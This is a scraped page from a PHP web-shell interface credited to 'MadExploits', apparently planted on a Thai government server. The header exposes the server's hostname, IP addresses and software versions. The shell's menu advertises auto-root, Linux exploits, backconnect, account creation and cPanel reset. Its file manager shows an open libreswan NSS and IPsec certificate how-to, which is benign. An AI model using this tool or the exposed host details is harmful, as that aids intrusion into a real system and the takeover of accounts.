Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libreswan-3.15 /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
opportunistic-v1.historic
[ DIR ]
drwxr-xr-x
CHANGES
44.74
KB
-rw-r--r--
CHANGES.freeswan.pluto
39.58
KB
-rw-r--r--
CHANGES.openswan
71.93
KB
-rw-r--r--
COPYING
17.57
KB
-rw-r--r--
CREDITS
867
B
-rw-r--r--
CREDITS.freeswan
2.88
KB
-rw-r--r--
CREDITS.openswan
2.38
KB
-rw-r--r--
LICENSE
1023
B
-rw-r--r--
PlutoFlow.png
35.25
KB
-rw-r--r--
PlutoFlow.svg
25.92
KB
-rw-r--r--
ProgrammingConventions.txt
5.3
KB
-rw-r--r--
README
7.42
KB
-rw-r--r--
README.IANA-PEN
214
B
-rw-r--r--
README.KLIPS
5.84
KB
-rw-r--r--
README.OCF
39
B
-rw-r--r--
README.XAUTH
2.71
KB
-rw-r--r--
README.labeledipsec
146
B
-rw-r--r--
README.nss
10.38
KB
-rw-r--r--
README.rfcs
6.97
KB
-rw-r--r--
README.x509
61
B
-rw-r--r--
ipsec.html
57.27
KB
-rw-r--r--
ipsecsaref.png
159.75
KB
-rw-r--r--
l2tp-overhead.txt
93
B
-rw-r--r--
libreswan-sysctl.conf
525
B
-rw-r--r--
nss-howto.txt
4.05
KB
-rw-r--r--
pluto-internals.txt
14.47
KB
-rw-r--r--
win2k-notes.txt
3.09
KB
-rw-r--r--
windows-cross-compile.txt
3.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nss-howto.txt
######################################################################### # Scenario: To setup ipsec with certs in tunnel mode using NSS ######################################################################### GW Mahine 1: w1.x1.y1.z1 GW Mahine 2: w2.x2.y2.z2 w1.x1.y1.z1 <---> w2.x2.y2.z2 Note: In this example setup, both machines are using NSS. If you want to use NSS only at one machine, say machine 1, you can use the following procedure only at machine 1, and you can use traditional ipsec setup at machine 2. 1. Create a new (if not already) nss db on both machines as follows: certutil -N -d sql:<path-to-ipsec.d dir>/ipsec.d (please note "sql:" in the begining of all the path). 2. Creating CA certs at both machines: On machine 1: certutil -S -k rsa -n cacert1 -s "CN=cacert1" -v 12 -d . -t "C,C,C" -x -d sql:<path-to-ipsec.d dir>/ipsec.d As we want to use the same certificate "cacert1" at machine 2, it needs to be exported first. To export the cacert1, do the following at machine 1: pk12util -o cacert1.p12 -n cacert1 -d sql:/etc/ipsec.d Copy the file "cacert1.p12" to the machine2 in "/etc/ipsec.d" directory. On machine 2: Import the "cacert1" as follows: cd /etc/ipsec.d pk12util -i cacert1.p12 -d sql:/etc/ipsec.d certutil -M -n cacert1 -t "C, C, C" -d sql:/etc/ipsec.d Now machine 2 also has the CA certificates "cacert1" in its NSS database. 3. Creating user certs at both machines: On machine 1: certutil -S -k rsa -c cacert1 -n usercert1 -s "CN=usercert1" -v 12 -t "u,u,u" -d sql:/etc/ipsec.d (Note this cert is signed by "cacert1") On machine 2: certutil -S -k rsa -c cacert1 -n usercert2 -s "CN=usercert2" -v 12 -t "u,u,u" -d sql:/etc/ipsec.d (Note this cert is signed by "cacert1" too) 4. Preparing ipsec.conf at both machines ipsec.conf at machine 1: conn pluto-1-2 left=w1.x1.y1.z1 leftid="CN=usercert1" leftsourceip=w1.x1.y1.z1 leftrsasigkey=%cert leftcert=usercert1 leftnexthop=w2.x2.y2.z2 right=w2.x2.y2.z2 rightid="CN=usercert2" rightsourceip=w2.x2.y2.z2 rightrsasigkey=%cert rightnexthop=w1.x1.y1.z1 rekey=no esp="aes-sha1" ike="aes-sha1" auto=add ipsec.conf at machine 2: conn pluto-1-2 left=w2.x2.y2.z2 leftid="CN=usercert2" leftsourceip=w2.x2.y2.z2 leftrsasigkey=%cert leftcert=usercert2 leftnexthop=w1.x1.y1.z1 right=w1.x1.y1.z1 rightid="CN=usercert1" rightsourceip=w1.x1.y1.z1 rightrsasigkey=%cert rightnexthop=w2.x2.y2.z2 rekey=no esp="aes-sha1" ike="aes-sha1" auto=add 5. Preparing ipsec.secrets at both machines ipsec.secrets at machine 1: : RSA usercert1 ipsec.secrets at machine 1: : RSA usercert2 ######################################################################### # Import certificates ######################################################################### This example show how to import certificates in nss. Is useful if you want to migrate from openswan to libreswan. Import a CA: certutil -A -i <ca_cert_file> -n "<ca_cert_alias>" -t "C,C,C" -d /etc/ipsec.d/ example: certutil -A -i /etc/ipsec.d/cacerts/CaCert.pem -n "CaCert" -t "C,C,C" -d /etc/ipsec.d/ Import a cert: certutil -A -i <cert_file> -n "<cert_alias>" -t "C,C,C" -d /etc/ipsec.d/ example: certutil -A -i /etc/ipsec.d/certs/serverCert.pemm -n "serverCert" -t "C,C,C" -d /etc/ipsec.d/ Import a client cert: certutil -A -i <cert_file> -n "<cert_alias>" -t "u,u,u" -d /etc/ipsec.d/ example: certutil -A -i /etc/ipsec.d/certs/userCert.pem -n "userCert" -t "u,u,u" -d /etc/ipsec.d/ Convert key: openssl pkcs12 -export -in /etc/ipsec.d/certs/userCert.pem -inkey /etc/ipsec.d/private/userKey.pem -name "userCert" -out /etc/ipsec.d/private/userKey.p12 Import Key: pk12util -i /etc/ipsec.d/private/userKey.p12 -d /etc/ipsec.d In your secret file you can use: : RSA "userCert" Show a list of the current certificates and trust attributes in a certificate database: certutil -L -d /etc/ipsec.d/
Close
